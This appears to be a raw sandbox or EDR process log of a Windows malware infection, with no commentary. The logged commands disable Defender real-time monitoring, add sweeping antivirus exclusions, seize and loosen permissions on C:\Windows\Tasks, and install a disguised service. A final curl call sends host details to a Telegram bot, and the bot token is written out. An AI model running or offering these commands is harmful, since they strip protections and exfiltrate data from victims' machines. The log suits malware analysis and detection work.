powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableRealtimeMonitoring $true
2060powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\migration , c:\users\kbtgt\desktop , C:\Windows\tasks , C:\Windows , C:\Windows\Logs , C:\Windows\SysWOW64 , C:\Windows\System32\WindowsPowerShell\v1.0 , C:\ProgramData , C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe , powershell.exe , c:\
22321.exe "C:\programdata\1.exe" /D
2376chcp.com chcp 65001
2600powershell.exe powershell Add-MpPreference -ExclusionPath c:\windows\migration\ , c:\users\kbtgt\desktop\ , C:\Windows\tasks\ , C:\Windows\ , C:\Windows\Logs\ , C:\Windows\SysWOW64\ , C:\Windows\System32\WindowsPowerShell\v1.0\ , C:\ProgramData\
2672tasklist.exe tasklist /FI "IMAGENAME eq Superfetch.exe"
2768find.exe find /I /N "Superfetch.exe"
2804takeown.exe takeown /f c:\windows\tasks
2952timeout.exe TIMEOUT /T 3 /NOBREAK
2996icacls.exe icacls "C:\Windows\Tasks" /inheritance:e /grant "*S-1-1-0:(R,REA,RA,RD)" "*S-1-5-7:(R,REA,RA,RD)"
2236icacls.exe icacls "C:\Windows\Tasks" /inheritance:e /grant "SYSTEM:(R,REA,RA,RD)"
2436icacls.exe icacls "C:\Windows\Tasks" /inheritance:e /grant "Administrators:(R,REA,RA,RD)"
2512icacls.exe icacls "C:\Windows\Tasks" /inheritance:e /grant "Users:(R,REA,RA,RD)"
2484icacls.exe icacls "C:\Windows\Tasks" /inheritance:e /grant "test22:(R,REA,RA,RD)"
2620icacls.exe icacls "C:\Windows\Tasks" /inheritance:e /grant "test22:(R,REA,RA,RD)"
2696icacls.exe icacls "C:\Windows\Tasks" /inheritance:e /grant "EVERYONE:(R,REA,RA,RD)"
2720timeout.exe TIMEOUT /T 3 /NOBREAK
2828timeout.exe TIMEOUT /T 1 /NOBREAK
2280Wmiic.exe "C:\windows\tasks\wmiic.exe" install WMService IntelConfigService.exe
2900timeout.exe TIMEOUT /T 1 /NOBREAK
2764Wmiic.exe "C:\windows\tasks\wmiic" start WMService
2852timeout.exe TIMEOUT /T 2 /NOBREAK
2340net1.exe C:\Windows\system32\net1 start WMService
2568WMIC.exe WMIC CPU Get Name /Value
2532findstr.exe FindStr .
2616cmd.exe C:\Windows\system32\cmd.exe /c WMIC /Node:localhost Path Win32_VideoController Get Name /Value| FIND.EXE "="
2740tasklist.exe tasklist /FI "IMAGENAME eq Superfetch.exe"
2784find.exe find /I /N "Superfetch.exe"
1676curl.exe c:\programdata\curl.exe --insecure --data chat_id="552691400" --data parse-mode=markdown --data-urlencode text="TEST22-PCCORE2Intel(R) Core(TM) i5-8400 CPU @ 2.80GHzIntel(R) Core(TM) i5-8400 CPU @ 2.80GHzSERVICE WMService NOT RUN" "https://api.telegram.org/bot"5086556714:AAF7DbEW7CWKb1GEIy6_inxVlrGJ39JUUBM"/sendMessage"
2104